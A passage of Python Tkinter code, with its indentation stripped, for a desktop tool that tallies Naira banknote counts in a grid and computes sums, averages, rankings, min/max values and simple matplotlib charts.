self.ted4.photos4=photos4
self.ted4.add_command(label='Min',command=self.min)
self.ted4.add_command(label='Max',image=photos5,compound='left',command=self.max)
self.ted4.photos5=photos5
#this are the entries for the function answers
ent=Text(self.test9,font=('blue',self.v.get()+1),bd=1,width=18,height=0,
wrap='char',undo=True,cursor='arrow',highlightthickness=0,state='disabled')
ent.grid(row=0,column=1)
sep=ttk.Separator(self.test9,orient='vertical')
sep.grid(row=0,column=1,rowspan=2,columnspan=2,sticky='ns')
h11.append(ent)
ent2=Text(self.test9,font=('blue',self.v.get()+1),bd=1,width=18,height=0,
wrap='char',undo=True,cursor='arrow',highlightthickness=0,state='disabled')
ent2.grid(row=0,column=2)
sep1=ttk.Separator(self.test9,orient='vertical')
sep1.grid(row=0,column=2,rowspan=2,columnspan=2,sticky='ns')
h11.append(ent2)
ent3=Text(self.test9,font=('blue',self.v.get()+1),bd=1,width=18,height=0,
wrap='char',undo=True,cursor='arrow',highlightthickness=0,state='disabled')
ent3.grid(row=0,column=3)
sep2=ttk.Separator(self.test9,orient='vertical')
sep2.grid(row=0,column=3,rowspan=2,columnspan=2,sticky='ns')
h11.append(ent3)
ent4=Text(self.test9,font=('blue',self.v.get()+1),bd=1,width=18,height=0,
wrap='char',undo=True,cursor='arrow',highlightthickness=0,state='disabled')
ent4.grid(row=0,column=4)
sep3=ttk.Separator(self.test9,orient='vertical')
sep3.grid(row=0,column=4,rowspan=2,columnspan=2,sticky='ns')
h11.append(ent4)
ent5=Text(self.test9,font=('blue',self.v.get()+1),bd=1,width=18,height=0,
wrap='char',undo=True,cursor='arrow',highlightthickness=0,state='disabled')
ent5.grid(row=0,column=5)
sep4=ttk.Separator(self.test9,orient='vertical')
sep4.grid(row=0,column=5,rowspan=2,columnspan=2,sticky='ns')
h11.append(ent5)
ent6=Text(self.test9,font=('blue',self.v.get()+1),bd=1,width=18,height=0,
wrap='char',undo=True,cursor='arrow',highlightthickness=0,state='disabled')
ent6.grid(row=0,column=6)
sep5=ttk.Separator(self.test9,orient='vertical')
sep5.grid(row=0,column=6,rowspan=2,columnspan=2,sticky='ns')
h11.append(ent6)
ent7=Text(self.test9,font=('blue',self.v.get()+1),bd=1,width=18,height=0,
wrap='char',undo=True,cursor='arrow',highlightthickness=0,state='disabled')
ent7.grid(row=0,column=7)
sep6=ttk.Separator(self.test9,orient='vertical')
sep6.grid(row=0,column=7,rowspan=2,columnspan=2,sticky='ns')
h11.append(ent7)
ent8=Text(self.test9,font=('blue',self.v.get()+1),bd=1,width=18,height=0,
wrap='char',undo=True,cursor='arrow',highlightthickness=0,state='disabled')
ent8.grid(row=0,column=8)
h11.append(ent8)
self.lf=round(0.0067708333*self.top.winfo_screenwidth()) #this is the font size variable for the p labels
self.ls=16 #this is the width size of the p label
#this the popupmenu for sum fuction
self.men=Menu(self.top,tearoff=0,bg='black',activebackground='white',activeforeground='black',font=('Time',10),fg='white',activeborderwidth=0,bd=0,relief=FLAT)
self.men.add_cascade(label=' Choose',state='disabled')
self.men.add_separator()
self.men.add_command(label='1. 1000 Naira row',command=lambda l=kist,d=h,w=ent,x=1000:self.cal(l,d,w,x))
self.men.add_command(label='2. 500 Naira row',command=lambda l=list2,d=h1,w=ent2,x=500:self.cal(l,d,w,x))
self.men.add_command(label='3. 200 Naira row',command=lambda l=list3,d=h2,w=ent3,x=200:self.cal(l,d,w,x))
self.men.add_command(label='4. 100 Naira row',command=lambda l=list4,d=h3,w=ent4,x=100:self.cal(l,d,w,x))
self.men.add_command(label='5. 50 Naira row',command=lambda l=list5,d=h4,w=ent5,x=50:self.cal(l,d,w,x))
self.men.add_command(label='6. 20 Naira row',command=lambda l=list6,d=h5,w=ent6,x=20:self.cal(l,d,w,x))
self.men.add_command(label='7. 10 Naira row',command=lambda l=list7,d=h6,w=ent7,x=10:self.cal(l,d,w,x))
self.men.add_command(label='8. 5 Naira row',command=lambda l=list8,d=h7,w=ent8,x=5:self.cal(l,d,w,x))
#This is the the popupmenu for average function
self.men2=Menu(self.top,tearoff=0,bg='black',activebackground='white',activeforeground='black',font=('Time',10),fg='white',activeborderwidth=0,bd=0,relief=FLAT)
self.men2.add_cascade(label=' Choose',state='disabled')
self.men2.add_command(label='1. 1000 Naira row',command=lambda l=kist,d=h,w=ent,x=1000:self.cal2(l,d,w,x))
self.men2.add_command(label='2. 500 Naira row',command=lambda l=list2,d=h1,w=ent2,x=500:self.cal2(l,d,w,x))
self.men2.add_command(label='3. 200 Naira row',command=lambda l=list3,d=h2,w=ent3,x=200:self.cal2(l,d,w,x))
self.men2.add_command(label='4. 100 Naira row',command=lambda l=list4,d=h3,w=ent4,x=100:self.cal2(l,d,w,x))
self.men2.add_command(label='5. 50 Naira row',command=lambda l=list5,d=h4,w=ent5,x=50:self.cal2(l,d,w,x))
self.men2.add_command(label='6. 20 Naira row',command=lambda l=list6,d=h5,w=ent6,x=20:self.cal2(l,d,w,x))
self.men2.add_command(label='7. 10 Naira row',command=lambda l=list7,d=h6,w=ent7,x=10:self.cal2(l,d,w,x))
self.men2.add_command(label='8. 5 Naira row',command=lambda l=list8,d=h7,w=ent8,x=5:self.cal2(l,d,w,x))
#This is the popupmenu for rank function
self.men3=Menu(self.top,tearoff=0,bg='black',activebackground='white',activeforeground='black',font=('Time',10),fg='white',activeborderwidth=0,bd=0,relief=FLAT)
self.men3.add_cascade(label=' Choose',state='disabled')
self.men3.add_command(label='1. 1000 Naira row',command=lambda l=kist,d=h,x='1000 Row':self.cal3(l,d,x))
self.men3.add_command(label='2. 500 Naira row',command=lambda l=list2,d=h1,x='500 Row':self.cal3(l,d,x))
self.men3.add_command(label='3. 200 Naira row',command=lambda l=list3,d=h2,x='200 Row':self.cal3(l,d,x))
self.men3.add_command(label='4. 100 Naira row',command=lambda l=list4,d=h3,x='100 Row':self.cal3(l,d,x))
self.men3.add_command(label='5. 50 Naira row',command=lambda l=list5,d=h4,x='50 Row':self.cal3(l,d,x))
self.men3.add_command(label='6. 20 Naira row',command=lambda l=list6,d=h5,x='20 Row':self.cal3(l,d,x))
self.men3.add_command(label='7. 10 Naira row',command=lambda l=list7,d=h6,x='10 Row':self.cal3(l,d,x))
self.men3.add_command(label='8. 5 Naira row',command=lambda l=list8,d=h7,x='5 Row':self.cal3(l,d,x))
#This is the popup menu for min function
self.men4=Menu(self.top,tearoff=0,bg='black',activebackground='white',activeforeground='black',font=('Time',10),fg='white',activeborderwidth=0,bd=0,relief=FLAT)
self.men4.add_cascade(label=' Choose',state='disabled')
self.men4.add_command(label='1. 1000 Naira row',command=lambda l=kist,d=h,w=ent:self.cal4(l,d,w))
self.men4.add_command(label='2. 500 Naira row',command=lambda l=list2,d=h1,w=ent2:self.cal4(l,d,w))
self.men4.add_command(label='3. 200 Naira row',command=lambda l=list3,d=h2,w=ent3:self.cal4(l,d,w))
self.men4.add_command(label='4. 100 Naira row',command=lambda l=list4,d=h3,w=ent4:self.cal4(l,d,w))
self.men4.add_command(label='5. 50 Naira row',command=lambda l=list5,d=h4,w=ent5:self.cal4(l,d,w))
self.men4.add_command(label='6. 20 Naira row',command=lambda l=list6,d=h5,w=ent6:self.cal4(l,d,w))
self.men4.add_command(label='7. 10 Naira row',command=lambda l=list7,d=h6,w=ent7:self.cal4(l,d,w))
self.men4.add_command(label='8. 5 Naira row',command=lambda l=list8,d=h7,w=ent8:self.cal4(l,d,w))
#This the popup menu for max function
self.men5=Menu(self.top,tearoff=0,bg='black',activebackground='white',activeforeground='black',font=('Time',10),fg='white',activeborderwidth=0,bd=0,relief=FLAT)
self.men5.add_cascade(label=' Choose',state='disabled')
self.men5.add_command(label='1. 1000 Naira row',command=lambda l=kist,d=h,w=ent:self.cal5(l,d,w))
self.men5.add_command(label='2. 500 Naira row',command=lambda l=list2,d=h1,w=ent2:self.cal5(l,d,w))
self.men5.add_command(label='3. 200 Naira row',command=lambda l=list3,d=h2,w=ent3:self.cal5(l,d,w))
self.men5.add_command(label='4. 100 Naira row',command=lambda l=list4,d=h3,w=ent4:self.cal5(l,d,w))
self.men5.add_command(label='5. 50 Naira row',command=lambda l=list5,d=h4,w=ent5:self.cal5(l,d,w))
self.men5.add_command(label='6. 20 Naira row',command=lambda l=list6,d=h5,w=ent6:self.cal5(l,d,w))
self.men5.add_command(label='7. 10 Naira row',command=lambda l=list7,d=h6,w=ent7:self.cal5(l,d,w))
self.men5.add_command(label='8. 5 Naira row',command=lambda l=list8,d=h7,w=ent8:self.cal5(l,d,w))
#This is popupmenu for basic graph plot
self.men6=Menu(self.top,tearoff=0,bg='black',activebackground='white',activeforeground='black',font=('Time',10),fg='white',activeborderwidth=0,bd=0,relief=FLAT)
self.men6.add_cascade(label=' Choose',state='disabled')
self.men6.add_command(label='1. 1000 Naira row',command=lambda l=kist,d=h,x='1000 Row':self.cal6(l,d,x))
self.men6.add_command(label='2. 500 Naira row',command=lambda l=list2,d=h1,x='500 Row':self.cal6(l,d,x))
self.men6.add_command(label='3. 200 Naira row',command=lambda l=list3,d=h2,x='200 Row':self.cal6(l,d,x))
self.men6.add_command(label='4. 100 Naira row',command=lambda l=list4,d=h3,x='100 Row':self.cal6(l,d,x))
self.men6.add_command(label='5. 50 Naira row',command=lambda l=list5,d=h4,x='50 Row':self.cal6(l,d,x))
self.men6.add_command(label='6. 20 Naira row',command=lambda l=list6,d=h5,x='20 Row':self.cal6(l,d,x))
self.men6.add_command(label='7. 10 Naira row',command=lambda l=list7,d=h6,x='10 Row':self.cal6(l,d,x))
self.men6.add_command(label='8. 5 Naira row',command=lambda l=list8,d=h7,x='5 Row':self.cal6(l,d,x))
#This is the popup menu for scatter graph plot
self.men7=Menu(self.top,tearoff=0,bg='black',activebackground='white',activeforeground='black',font=('Time',10),fg='white',activeborderwidth=0,bd=0,relief=FLAT)
self.men7.add_cascade(label=' Choose',state='disabled')
self.men7.add_command(label='1. 1000 Naira row',command=lambda l=kist,d=h,x='1000 Row':self.cal7(l,d,x))
self.men7.add_command(label='2. 500 Naira row',command=lambda l=list2,d=h1,x='500 Row':self.cal7(l,d,x))
self.men7.add_command(label='3. 200 Naira row',command=lambda l=list3,d=h2,x='200 Row':self.cal7(l,d,x))
self.men7.add_command(label='4. 100 Naira row',command=lambda l=list4,d=h3,x='100 Row':self.cal7(l,d,x))
self.men7.add_command(label='5. 50 Naira row',command=lambda l=list5,d=h4,x='50 Row':self.cal7(l,d,x))
self.men7.add_command(label='6. 20 Naira row',command=lambda l=list6,d=h5,x='20 Row':self.cal7(l,d,x))
self.men7.add_command(label='7. 10 Naira row',command=lambda l=list7,d=h6,x='10 Row':self.cal7(l,d,x))
self.men7.add_command(label='8. 5 Naira row',command=lambda l=list8,d=h7,x='5 Row':self.cal7(l,d,x))
#This is the popup menu for bar graph plot
self.men8=Menu(self.top,tearoff=0,bg='black',activebackground='white',activeforeground='black',font=('Time',10),fg='white',activeborderwidth=0,bd=0,relief=FLAT)
self.men8.add_cascade(label=' Choose',state='disabled')
self.men8.add_command(label='1. 1000 Naira row',command=lambda l=kist,d=h,x='1000 Row':self.cal8(l,d,x))
self.men8.add_command(label='2. 500 Naira row',command=lambda l=list2,d=h1,x='500 Row':self.cal8(l,d,x))
self.men8.add_command(label='3. 200 Naira row',command=lambda l=list3,d=h2,x='200 Row':self.cal8(l,d,x))
self.men8.add_command(label='4. 100 Naira row',command=lambda l=list4,d=h3,x='100 Row':self.cal8(l,d,x))
self.men8.add_command(label='5. 50 Naira row',command=lambda l=list5,d=h4,x='50 Row':self.cal8(l,d,x))
self.men8.add_command(label='6. 20 Naira row',command=lambda l=list6,d=h5,x='20 Row':self.cal8(l,d,x))
self.men8.add_command(label='7. 10 Naira row',command=lambda l=list7,d=h6,x='10 Row':self.cal8(l,d,x))
self.men8.add_command(label='8. 5 Naira row',command=lambda l=list8,d=h7,x='5 Row':self.cal8(l,d,x))
self.f5=Frame(self.top)
self.color='black'
label=Button(self.f5,text='It worked').pack()
self.p1=Label(self.f4,text='1000 Naira', font=('blue', self.lf, 'bold'),width=self.ls,bg=self.color,fg='white')
self.p1.grid(row=0, column=0)
h10.append(self.p1)
#this are the buttons resposible to trigger a function
self.bu1=Button(self.test9,text='Sum',font=('Time',self.v.get()-2,),
width=22,command=lambda l=kist,d=h,w=ent,x=1000:self.cal(l,d,w,x))
self.bu1.grid(row=1,column=1,ipadx=round(self.width/960))
self.bu2=Button(self.test9,text='Sum',font=('Time',self.v.get()-2,),
width=22,command=lambda l=list2,d=h1,w=ent2,x=500:self.cal(l,d,w,x))
self.bu2.grid(row=1,column=2,ipadx=round(self.width/960))
self.bu3=Button(self.test9,text='Sum',font=('Time',self.v.get()-2,),
width=22,command=lambda l=list3,d=h2,w=ent3,x=200:self.cal(l,d,w,x))
self.bu3.grid(row=1,column=3,ipadx=round(self.width/960))
self.bu4=Button(self.test9,text='Sum',font=('Time',self.v.get()-2,),
width=22,command=lambda l=list4,d=h3,w=ent4,x=100:self.cal(l,d,w,x))
self.bu4.grid(row=1,column=4,ipadx=round(self.width/960))
self.bu5=Button(self.test9,text='Sum',font=('Time',self.v.get()-2,),
width=22,command=lambda l=list5,d=h4,w=ent5,x=50:self.cal(l,d,w,x))
self.bu5.grid(row=1,column=5,ipadx=round(self.width/960))
self.bu6=Button(self.test9,text='Sum',font=('Time',self.v.get()-2,),
width=22,command=lambda l=list6,d=h5,w=ent6,x=20:self.cal(l,d,w,x))
self.bu6.grid(row=1,column=6,ipadx=round(self.width/960))
self.bu7=Button(self.test9,text='Sum',font=('Time',self.v.get()-2,),
width=22,command=lambda l=list7,d=h6,w=ent7,x=10:self.cal(l,d,w,x))
self.bu7.grid(row=1,column=7,ipadx=round(self.width/960))
self.bu8=Button(self.test9,text='Sum',font=('Time',self.v.get()-2,),
width=22,command=lambda l=list8,d=h7,w=ent8,x=5:self.cal(l,d,w,x))
self.bu8.grid(row=1,column=8,ipadx=round(self.width/960))
#self.readyfr=Frame(self.test9)
#self.ready=Label(self.readyfr,text='Ready')
#self.ready.grid(row=0,column=0)
#self.readyfr.grid(row=2,column=1)
#size of the entries
for i0 in range(len(self.nam)):
la=Label(self.f3,text=str(i0+1),font=('blue',self.v.get(),'normal'),fg='black',bg='#EBEBE6')
#sep=ttk.Separator(f3,orient='horizontal')
#sep.grid(row=i0,column=0,rowspan=2,columnspan=1,sticky='ew')
la.grid(row=i0,column=0,sticky='w')
self.confi=Image.open(r"C:\Users\PASCAL\Desktop\FES Project\project 1\configure.png")
self.cong=ImageTk.PhotoImage(self.confi.resize((round(self.width/7.84),round(self.height/36))))
self.config=Button(self.test10,image=self.cong,font=('helvectica',5,'bold'),borderwidth=0,bd=0,bg='black',
activebackground='#EBEBE6',command=self.bind)
self.back=Button(self.test10,text='Back',font=('helvectica',self.v.get(),'bold'),bd=2,borderwidth=0,command=second.close)
self.config.grid(row=1,column=0)
self.back.grid(row=2,column=0)
for ip in range(50):
for jp in range(1):
g0= Text(self.f3, font=('blue',self.v.get()+1),bd=1,width=18,height=0,wrap='char',undo=True,autoseparators=True,cursor='arrow',highlightthickness=0)
g0.grid(row=ip, column=jp+2,sticky='nsew')
Grid.rowconfigure(self.f3,ip,weight=1)
Grid.columnconfigure(self.f3,jp+2,weight=1)
#wep=ttk.Separator(self.f3,orient='vertical')
#wep.grid(row=ip,column=jp+2,sticky='ns')
list9.append(g0)
""" the for loops are the entries that forms the rows and columns
of the cells it's made up of 50 rows and 8 columns"""
if len(self.names)>0:
for ir in range(len(self.names)):
list9[ir].delete(1.0,END)
list9[ir].insert(1.0,self.names[ir][0])
list9[ir].config(state='disabled')
if len(self.names)==0:
for ir2 in range(len(list9)):
list9[ir2].config(state='disabled')
#3except TclError:
#pass
for i in range(50):
for j in range(1):
self.g = Text(self.f2, font=('blue',self.v.get()+1),bd=1,width=18,height=0,
wrap='char',autoseparators=True,undo=True,cursor='plus',highlightthickness=0)
self.g.grid(row=i+1, column=j+1)
Grid.rowconfigure(self.f2,i+1,weight=1)
Grid.columnconfigure(self.f2,j+1,weight=1)
wep=ttk.Separator(self.f2,orient='vertical')
wep.grid(row=i+1,column=j+1,rowspan=2,columnspan=2,sticky='ns')
kist.append(self.g)
p2=Label(self.f4,text='500 Naira', font=('blue', self.lf, 'bold'),width=self.ls,bg=self.color,fg='blue')
p2.grid(row=0, column=1)
h10.append(p2)
for i2 in range(1, 51):
g2 = Text(self.f2, font=('blue',self.v.get()+1),bd=1,width=18,height=0,
wrap='char',undo=True,cursor='plus',highlightthickness=0)
g2.grid(row=i2, column=2)
wep=ttk.Separator(self.f2,orient='vertical')
wep.grid(row=i2,column=2,rowspan=2,columnspan=2,sticky='ns')
list2.append(g2)
p3=Label(self.f4,text='200 Naira', font=('blue', self.lf,'bold'),width=self.ls,bg=self.color,fg='cyan')
p3.grid(row=0, column=2)
h10.append(p3)
for i3 in range(1,51):
g3=Text(self.f2, font=('blue',self.v.get()+1),bd=1,width=18,height=0,
wrap='char',undo=True,cursor='plus',highlightthickness=0)
g3.grid(row=i3, column=3)
wep=ttk.Separator(self.f2,orient='vertical')
wep.grid(row=i3,column=3,rowspan=2,columnspan=2,sticky='ns')
list3.append(g3)
p4=Label(self.f4,text='100 Naira', font=('blue', self.lf, 'bold'),width=self.ls,bg=self.color,fg='powder blue')
p4.grid(row=0, column=3)
h10.append(p4)
for i4 in range(1,51):
g4=Text(self.f2, font=('blue',self.v.get()+1),bd=1,width=18,height=0,
wrap='char',undo=True,cursor='plus',highlightthickness=0)
g4.grid(row=i4, column=4)
wep=ttk.Separator(self.f2,orient='vertical')
wep.grid(row=i4,column=4,rowspan=2,columnspan=2,sticky='ns')
list4.append(g4)
p5=Label(self.f4,text='50 Naira', font=('blue', self.lf, 'bold'),width=self.ls,bg=self.color,fg='turquoise')
p5.grid(row=0, column=4)
h10.append(p5)
for i5 in range(1,51):
g5=Text(self.f2, font=('blue',self.v.get()+1),bd=1,width=18,height=0,
wrap='char',undo=True,cursor='plus',highlightthickness=0)
g5.grid(row=i5, column=5)
wep=ttk.Separator(self.f2,orient='vertical')
wep.grid(row=i5,column=5,rowspan=2,columnspan=2,sticky='ns')
list5.append(g5)
p6=Label(self.f4,text='20 Naira', font=('blue', self.lf, 'bold'),width=self.ls,bg=self.color,fg='light green')
p6.grid(row=0, column=5)
h10.append(p6)
for i6 in range(1,51):
g6=Text(self.f2, font=('blue',self.v.get()+1),bd=1,width=18,height=0,
wrap='char',undo=True,cursor='plus',highlightthickness=0)
g6.grid(row=i6, column=6)
wep=ttk.Separator(self.f2,orient='vertical')
wep.grid(row=i6,column=6,rowspan=2,columnspan=2,sticky='ns')
list6.append(g6)
p7=Label(self.f4,text='10 Naira', font=('blue',self.lf, 'bold'),width=self.ls,bg=self.color,fg='tan')
p7.grid(row=0, column=6)
h10.append(p7)
for i7 in range(1,51):
g7 = Text(self.f2,font=('blue',self.v.get()+1),bd=1,width=18,height=0,
wrap='char',undo=True,cursor='plus',highlightthickness=0)
g7.grid(row=i7, column=7)
wep=ttk.Separator(self.f2,orient='vertical')
wep.grid(row=i7,column=7,rowspan=2,columnspan=2,sticky='ns')
list7.append(g7)
p8=Label(self.f4,text='5 Naira', font=('blue', self.lf, 'bold'),width=self.ls,bg=self.color,fg='pink')
p8.grid(row=0, column=7)
h10.append(p8)
for i8 in range(1,51):
g8 = Text(self.f2, font=('blue',self.v.get()+1),bd=1,width=18,height=0,
wrap='char',undo=True,cursor='plus',highlightthickness=0)
g8.grid(row=i8, column=8)
#wep=ttk.Separator(self.f2,orient='vertical')
#wep.grid(row=18,column=8,rowspan=2,columnspan=2,sticky='ns')
list8.append(g8)
self.c3.update_idletasks()
self.c.update_idletasks()
self.toolbar2.update_idletasks()
self.toolbar.update_idletasks()
self.testf.update_idletasks()
self.testy.update_idletasks()
self.toolbar2.create_window(round(self.width/192),round(self.height/36),anchor='w',window=self.f6)
self.toolbar.create_window(round(self.width/192),round(self.height/36),anchor='w',window=self.f7)
self.testy.create_window(round(self.width/13.71),round(self.height/10.3),anchor='s',window=self.test10)
self.testf.create_window(0,0,anchor='s',window=self.test9)
self.toolbar.grid(row=0,column=3,sticky='nsew')
self.toolbar.grid_propagate(False)
self.testf.config(scrollregion=self.testf.bbox('all'),xscrollcommand=self.sc.set)
self.testf.xview_moveto(0.0)
self.toolbar2.grid(row=0,column=0,sticky='nsew')
self.toolbar2.grid_propagate(False)
self.c3.create_window(0,0,anchor='ne',window=self.f4)
self.c3.config(scrollregion=self.c3.bbox('all'),xscrollcommand=self.sc.set)
self.c3.xview_moveto(0.0)
self.c.create_window(0,0,anchor='w',window=self.f2)
self.c.configure(scrollregion=self.c.bbox('all'),yscrollcommand=self.sc1.set,xscrollcommand=self.sc.set)
self.testy.grid(row=28,column=0)
self.testy.grid_propagate(False)
self.c.grid(row=4,column=3,sticky='nsew')
self.c.yview_moveto(0.0)
self.c.xview_moveto(0.0)
self.c.grid_propagate(False)
self.c3.grid(row=3,column=3,sticky='nsew')
self.c3.grid_propagate(False)
self.c4.grid(row=3,column=0,sticky='nsew')
self.sc.grid(row=0,column=0,sticky='nsew')
self.testf.grid(row=28,column=3,sticky='nsew')
self.testf.grid_propagate(False)
#self.barframe.grid(row=4,column=4,sticky='news')
self.sc1.grid(row=4,column=4,sticky='nsew')
self.c2.update_idletasks()
self.c2.create_window(0,0,anchor='w',window=self.f3)
self.c2.config(scrollregion=self.c2.bbox('all'),yscrollcommand=self.sc1.set)
self.c2.yview_moveto(0.0)
self.c2.xview_moveto(0.0)
self.c2.grid(row=4,column=0,sticky='nsew')
self.c2.grid_propagate(False)
#Grid.columnconfigure(self.top,0,weight=1)
Grid.columnconfigure(self.top,3,weight=10)
Grid.rowconfigure(self.top,1,weight=10)
Grid.rowconfigure(self.top,28,weight=10)
Grid.rowconfigure(self.top,3,weight=10)
Grid.rowconfigure(self.top,4,weight=10)
self.config_themes5()
self.top.after(100,self.forcer)
self.top.after_idle(self.top.focus_force)
#self.update('e')
#self.top.update()
#binding sc horizontal scrollbar to c2 and c
def verify2(self,input):
print(input)
def scroll(self,*args):
threading.Thread(target=self.c.yview(*args)).start()
threading.Thread(target=self.c2.yview(*args)).start()
#binding sc2 scrollbar to c and c3
def scroll1(self,*args):
threading.Thread(target=self.c.xview(*args)).start()
threading.Thread(target=self.c3.xview(*args)).start()
threading.Thread(target=self.testf.xview(*args)).start()
#binding the up-arrow key to sc scrollbar
def up(self,e):
threading.Thread(target=self.c.yview_scroll(-1,'units')).start()
threading.Thread(target=self.c2.yview_scroll(-1,'units')).start()
#binding the down-arrow key to sc scrollbar
def down(self,e):
threading.Thread(target=self.c.yview_scroll(1,'units')).start()
threading.Thread(target=self.c2.yview_scroll(1,'units')).start()
#binding the right arrow key to sc2 scrollbar
def right(self,e):
threading.Thread(target=self.c.xview_scroll(1,'units')).start()
threading.Thread(target=self.c3.xview_scroll(1,'units')).start()
threading.Thread(target=self.testf.xview_scroll(1,'units')).start()
#binding the left arrowkkey to sc2 scrollbar
def left(self,e):
threading.Thread(target=self.c.xview_scroll(-1,'units')).start()
threading.Thread(target=self.c3.xview_scroll(-1,'units')).start()
threading.Thread(target=self.testf.xview_scroll(-1,'units')).start()
#summation function fuction call
def cal(self,l,d,w,x):
w.config(state='normal')
global count1
count1+=1
count=0
for c in l:
if c.get(1.0,'end-1c').isdigit():
d.append(int(c.get(1.0,'end-1c')))
if count1>1:
w.delete(1.0,'end')
w.insert(1.0,'{:,} naira'.format(sum(d)*x))
else:
w.insert(1.0,'{:,} naira'.format(sum(d)*x))
del d[:]
#averagefunction function call
def cal2(self,l,d,w,x):
w.configure(state='normal')
global count1
count1+=1
for c in l:
if c.get(1.0,'end-1c').isdigit():
d.append(int(c.get(1.0,'end-1c')))
if count1>1:
w.delete(1.0,'end')
w.insert(1.0,'Avr {:,.2f} Naira'.format((sum(d)/len(d))*x))
else:
w.insert(1.0,'Avr {:,.2f} Naira'.format((sum(d)/len(d))*x))
del d[:]
#rankfunction function call
def cal3(self,l,d,x):
global count1
count1+=1
for c in l:
test.append(c.get(1.0,'end-1c'))
if c.get(1.0,'end-1c').isdigit():
d.append(int(c.get(1.0,'end-1c')))
d.sort()
self.d=d[::1]
self.display(x)
del d[:]
del test[:]
#minfuntion function call
def cal4(self,l,d,w):
w.configure(state='normal')
global count1
count1+=1
for c in l:
test.append(c.get(1.0,'end-1c'))
if c.get(1.0,'end1-1c').isdigit():
d.append(int(c.get(1.0,'end-1c')))
if count1>1:
w.delete(1.0,'end')
w.insert(1.0,'Min {}'.format(min(d)))
else:
w.insert(1.0,'Min {}'.format(min(d)))
del d[:]
#maxfunction function call
def cal5(self,l,d,w):
w.configure(state='normal')
global count1
count1+=1
for c in l:
test.append(c.get())
if c.get(1.0,'end-1c').isdigit():
d.append(int(c.get(1.0,'end-1c')))
if count1>1:
w.delete(1.0,'end')
w.insert(1.0,'Max {}'.format(max(d)))
else:
w.insert(1.0,'Max {}'.format(max(d)))
del d[:]
def cal6(self,l,d,x):
top6=Toplevel(self.top)
top6.attributes('-toolwindow',True)
top6.iconphoto(False,self.j2)
top6.resizable(1,0)
size=plt.figure(figsize=(7,8),dpi=100)
for c in l:
if c.get(1.0,'end-1c').isdigit():
d.append(int(c.get(1.0,'end-1c')))
plot1=size.add_subplot(111)
plot1.plot(d)
graph_canvas=FigureCanvasTkAgg(size,top6)
graph_canvas.draw()
graph_canvas.get_tk_widget().pack()
tool=NavigationToolbar2Tk(graph_canvas,top6)
tool.update()
plt.xlabel('x-axis')
plt.ylabel('{} ({})'.format('y-axis',x+' '+'entries'))
plt.title(x)
graph_canvas.get_tk_widget().pack()
del d[:]
def cal7(self,l,d,x):
top6=Toplevel(self.top)
top6.attributes('-toolwindow',True)
top6.iconphoto(False,self.j2)
top6.resizable(1,0)
size=plt.figure(figsize=(7,8),dpi=100)
for c in l:
if c.get(1.0,'end-1c').isdigit():
d.append(int(c.get(1.0,'end-1c')))
for i in range(len(d)):
graph.append(i)
plot1=size.add_subplot(111)
plot1.cla()
plot1.scatter(graph,d)
graph_canvas=FigureCanvasTkAgg(size,top6)
graph_canvas.draw()
graph_canvas.get_tk_widget().pack()
tool=NavigationToolbar2Tk(graph_canvas,top6)
tool.update()
plt.xlabel('x-axis')
plt.ylabel('{} ({})'.format('y-axis',x+' '+'entries'))
plt.title(x)
graph_canvas.get_tk_widget().pack()
del d[:]
del graph[:]
def cal8(self,l,d,x):
top6=Toplevel(self.top)
top6.attributes('-toolwindow',True)
top6.iconphoto(False,self.j2)
top6.resizable(1,0)
size=plt.figure(figsize=(7,8),dpi=100)
for c in l:
if c.get(1.0,'end-1c').isdigit():
d.append(int(c.get(1.0,'end-1c')))
for i in range(len(d)):
graph.append(i)
plot1=size.add_subplot(111)
plot1.cla()
plot1.bar(graph,d,width=0.7)
graph_canvas=FigureCanvasTkAgg(size,top6)
graph_canvas.draw()
graph_canvas.get_tk_widget().pack()
tool=NavigationToolbar2Tk(graph_canvas,top6)
tool.update()
plt.xlabel('x-axis')
plt.ylabel('{} ({})'.format('y-axis',x+' '+'entries'))
plt.title(x)
graph_canvas.get_tk_widget().pack()
del d[:]
del graph[:]
#display of the listbox containing the ranks
def display(self,x):
self.top2=Toplevel(self.top)
self.top2.iconphoto(False,self.j2)
self.top2.title('Financial Analysis')
self.top2.resizable(0,0)
self.top2.attributes('-toolwindow',True)
self.box=Listbox(self.top2)
self.scr2=Scrollbar(self.top2,orient='horizontal',command=self.box.xview)
self.scro=Scrollbar(self.top2,orient='vertical',command=self.box.yview)
lab=Label(self.top2,text=x,bg='black',fg='white',width=20).grid(row=0,column=0,sticky='n')
self.se=IntVar()
self.se.set(1)
self.asc=Radiobutton(self.top2,text='Ascending',bd=0,borderwidth=0,var=self.se,value=1,command=self.display2)
self.dec=Radiobutton(self.top2,text='Descending',bd=0,borderwidth=0,var=self.se,value=2,command=self.display2)
for i in range(len(self.d)):
self.box.insert(END,'{}'.format('(')+str(i+1)+'{}'.format(')')+' '+str(self.d[i]))
self.asc.grid(row=2,sticky='s')
self.dec.grid(row=3,stick='s')
self.box.grid(row=0,column=0,sticky='n',pady=30)
self.box.config(yscrollcommand=self.scro.set,xscrollcommand=self.scr2.set)
self.scro.grid(row=0,column=2,sticky='ns',pady=30)
self.scr2.grid(row=1,sticky='ew')
#Radiobuutons command to change the sequence of the ranks i.e ascending or descending order
def display2(self):
if self.se.get()==1:
self.box.delete(0,END)
for i in range(len(self.d)):
self.box.insert(END,'{}'.format('(')+str(i+1)+'{}'.format(')')+' '+str(self.d[i]))
if self.se.get()==2:
self.box.delete(0,END)
for i in range(len(self.d)):
self.box.insert(0,'{}'.format('(')+str(len(self.d)-(i))+'{}'.format(')')+' '+str(self.d[i]))
#popmenu function for the sum fuction
def sum(self):
x=self.men.winfo_pointerx()
y=self.men.winfo_pointery()
try:
self.men.tk_popup(x,y,0)
finally:
self.men.grab_release()
#popupmenu function for the average function
def average(self):
x=self.men2.winfo_pointerx()
y=self.men2.winfo_pointery()
try:
self.men2.tk_popup(x,y,0)
finally:
self.men2.grab_release()
#popupmenu function for the rank funtion
def rank(self):
x=self.men3.winfo_pointerx()
y=self.men3.winfo_pointery()
try:
self.men3.tk_popup(x,y,0)
finally:
self.men3.grab_release()
#popupmenu for the min fuction
def min(self):
x=self.men4.winfo_pointerx()
y=self.men4.winfo_pointery()
try:
self.men4.tk_popup(x,y,0)
finally:
self.men4.grab_release()
#popupmenu function for the max function
def max(self):
x=self.men5.winfo_pointerx()
y=self.men5.winfo_pointery()
try:
self.men5.tk_popup(x,y,0)
finally:
self.men5.grab_release()
#poopup menu for the basic graph function
def graph(self):
x=self.men6.winfo_pointerx()
y=self.men6.winfo_pointery()
try:
self.men6.tk_popup(x,y,0)
finally:
